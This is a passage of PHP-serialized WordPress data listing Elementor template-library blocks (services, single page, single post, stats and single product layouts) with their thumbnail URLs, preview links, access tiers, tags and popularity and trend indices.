5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_7.png\";s:12:\"tmpl_created\";i:1520443266;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:587;s:16:\"popularity_index\";i:58;s:11:\"trend_index\";i:97;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:732;a:21:{s:4:\"tmpl\";i:410;s:2:\"id\";i:4293;s:5:\"title\";s:10:\"Services 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_6.png\";s:12:\"tmpl_created\";i:1520443265;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:588;s:16:\"popularity_index\";i:288;s:11:\"trend_index\";i:269;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:733;a:21:{s:4:\"tmpl\";i:409;s:2:\"id\";i:4284;s:5:\"title\";s:10:\"Services 7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_5.png\";s:12:\"tmpl_created\";i:1520443263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:589;s:16:\"popularity_index\";i:27;s:11:\"trend_index\";i:21;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:734;a:21:{s:4:\"tmpl\";i:407;s:2:\"id\";i:4268;s:5:\"title\";s:10:\"Services 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_4.png\";s:12:\"tmpl_created\";i:1520443259;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:590;s:16:\"popularity_index\";i:173;s:11:\"trend_index\";i:213;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:735;a:21:{s:4:\"tmpl\";i:405;s:2:\"id\";i:4252;s:5:\"title\";s:10:\"Services 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_3.png\";s:12:\"tmpl_created\";i:1520443255;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:591;s:16:\"popularity_index\";i:46;s:11:\"trend_index\";i:99;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:736;a:21:{s:4:\"tmpl\";i:677;s:2:\"id\";i:8676;s:5:\"title\";s:13:\"single page 1\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.6.jpg\";s:12:\"tmpl_created\";i:1527682423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:592;s:16:\"popularity_index\";i:285;s:11:\"trend_index\";i:145;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:737;a:21:{s:4:\"tmpl\";i:678;s:2:\"id\";i:8678;s:5:\"title\";s:13:\"single page 2\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.2.jpg\";s:12:\"tmpl_created\";i:1527682780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:593;s:16:\"popularity_index\";i:140;s:11:\"trend_index\";i:82;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:738;a:21:{s:4:\"tmpl\";i:679;s:2:\"id\";i:8679;s:5:\"title\";s:13:\"single page 3\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.3.jpg\";s:12:\"tmpl_created\";i:1527682847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:594;s:16:\"popularity_index\";i:122;s:11:\"trend_index\";i:23;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:739;a:21:{s:4:\"tmpl\";i:680;s:2:\"id\";i:8680;s:5:\"title\";s:13:\"single page 4\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.1.jpg\";s:12:\"tmpl_created\";i:1527682896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:595;s:16:\"popularity_index\";i:373;s:11:\"trend_index\";i:190;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:740;a:21:{s:4:\"tmpl\";i:681;s:2:\"id\";i:8681;s:5:\"title\";s:13:\"single page 5\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.5.jpg\";s:12:\"tmpl_created\";i:1527682969;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:596;s:16:\"popularity_index\";i:287;s:11:\"trend_index\";i:218;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:741;a:21:{s:4:\"tmpl\";i:682;s:2:\"id\";i:8682;s:5:\"title\";s:13:\"single page 6\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.4.jpg\";s:12:\"tmpl_created\";i:1527683026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:597;s:16:\"popularity_index\";i:412;s:11:\"trend_index\";i:227;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:742;a:21:{s:4:\"tmpl\";i:683;s:2:\"id\";i:8703;s:5:\"title\";s:13:\"single page 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.7.jpg\";s:12:\"tmpl_created\";i:1527683072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:598;s:16:\"popularity_index\";i:401;s:11:\"trend_index\";i:316;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:743;a:21:{s:4:\"tmpl\";i:640;s:2:\"id\";i:7650;s:5:\"title\";s:13:\"Single Post 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/single_post_1_v2.jpg\";s:12:\"tmpl_created\";i:1521557736;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:24:\"[\"Blog\",\"Post\",\"Single\"]\";s:10:\"menu_order\";i:599;s:16:\"popularity_index\";i:119;s:11:\"trend_index\";i:266;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:744;a:21:{s:4:\"tmpl\";i:639;s:2:\"id\";i:7663;s:5:\"title\";s:13:\"Single Post 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/single_post_2_v2.jpg\";s:12:\"tmpl_created\";i:1521547761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:24:\"[\"Blog\",\"Post\",\"Single\"]\";s:10:\"menu_order\";i:600;s:16:\"popularity_index\";i:50;s:11:\"trend_index\";i:139;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:745;a:21:{s:4:\"tmpl\";i:705;s:2:\"id\";i:9296;s:5:\"title\";s:13:\"Single Post 3\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3002.jpg\";s:12:\"tmpl_created\";i:1537440673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:601;s:16:\"popularity_index\";i:213;s:11:\"trend_index\";i:204;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:746;a:21:{s:4:\"tmpl\";i:704;s:2:\"id\";i:9301;s:5:\"title\";s:13:\"Single Post 4\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3003.jpg\";s:12:\"tmpl_created\";i:1537440661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:602;s:16:\"popularity_index\";i:248;s:11:\"trend_index\";i:336;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:747;a:21:{s:4:\"tmpl\";i:706;s:2:\"id\";i:9313;s:5:\"title\";s:13:\"Single Post 5\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3001.jpg\";s:12:\"tmpl_created\";i:1537440798;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:603;s:16:\"popularity_index\";i:197;s:11:\"trend_index\";i:177;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:748;a:21:{s:4:\"tmpl\";i:707;s:2:\"id\";i:9343;s:5:\"title\";s:13:\"Single Post 6\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3004.jpg\";s:12:\"tmpl_created\";i:1537443531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:604;s:16:\"popularity_index\";i:228;s:11:\"trend_index\";i:279;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:749;a:21:{s:4:\"tmpl\";i:708;s:2:\"id\";i:9349;s:5:\"title\";s:13:\"Single Post 7\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3005.jpg\";s:12:\"tmpl_created\";i:1537443903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:605;s:16:\"popularity_index\";i:158;s:11:\"trend_index\";i:253;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:750;a:21:{s:4:\"tmpl\";i:555;s:2:\"id\";i:6114;s:5:\"title\";s:7:\"Stats 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_6.png\";s:12:\"tmpl_created\";i:1520443659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:610;s:16:\"popularity_index\";i:434;s:11:\"trend_index\";i:692;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:751;a:21:{s:4:\"tmpl\";i:562;s:2:\"id\";i:6178;s:5:\"title\";s:8:\"Stats 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_2.png\";s:12:\"tmpl_created\";i:1520443676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:611;s:16:\"popularity_index\";i:435;s:11:\"trend_index\";i:755;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:752;a:21:{s:4:\"tmpl\";i:561;s:2:\"id\";i:6170;s:5:\"title\";s:8:\"Stats 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_2.png\";s:12:\"tmpl_created\";i:1520443670;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:612;s:16:\"popularity_index\";i:366;s:11:\"trend_index\";i:552;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:753;a:21:{s:4:\"tmpl\";i:697;s:2:\"id\";i:9174;s:5:\"title\";s:17:\"single product 01\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product01_350.png\";s:12:\"tmpl_created\";i:1532950125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/single-product-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:612;s:16:\"popularity_index\";i:31;s:11:\"trend_index\";i:6;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:754;a:21:{s:4:\"tmpl\";i:563;s:2:\"id\";i:6186;s:5:\"title\";s:8:\"Stats 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_3.png\";s:12:\"tmpl_created\";i:1520443678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:613;s:16:\"popularity_index\";i:569;s:11:\"trend_index\";i:811;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:755;a:21:{s:4:\"tmpl\";i:698;s:2:\"id\";i:9178;s:5:\"title\";s:17:\"single product 02\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product02_350new.png\";s:12:\"tmpl_created\";i:1532951997;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/single-product-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:613;s:16:\"popularity_index\";i:66;s:11:\"trend_index\";i:42;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:756;a:21:{s:4:\"tmpl\";i:550;s:2:\"id\";i:6071;s:5:\"title\";s:8:\"Stats 13\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_3.png\";s:12:\"tmpl_created\";i:1520443649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:614;s:16:\"popularity_index\";i:168;s:11:\"trend_index\";i:328;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:757;a:21:{s:4:\"tmpl\";i:699;s:2:\"id\";i:9180;s:5:\"title\";s:17:\"single product 03\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product03_350.png\";s:12:\"tmpl_created\";i:1532952302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/single-product-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:614;s:16:\"popularity_index\";i:108;s:11:\"trend_index\";i:66;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:758;a:21:{s:4:\"tmpl\";i:554;s:2:\"id\";i:6106;s:5:\"title\";s:7:\"Stats 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_6.png\";s:12:\"tmpl_created\";i:1520443657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:615;s:16:\"popularity_index\";i:361;s:11:\"trend_index\";i:784;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:759;a:21:{s:4:\"tmpl\";i:700;s:2:\"id\";i:9182;s:5:\"title\";s:17:\"single product 04\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product040_350.png\";s:12:\"tmpl_created\";i:1532952606;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/single-product-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:14:\"single 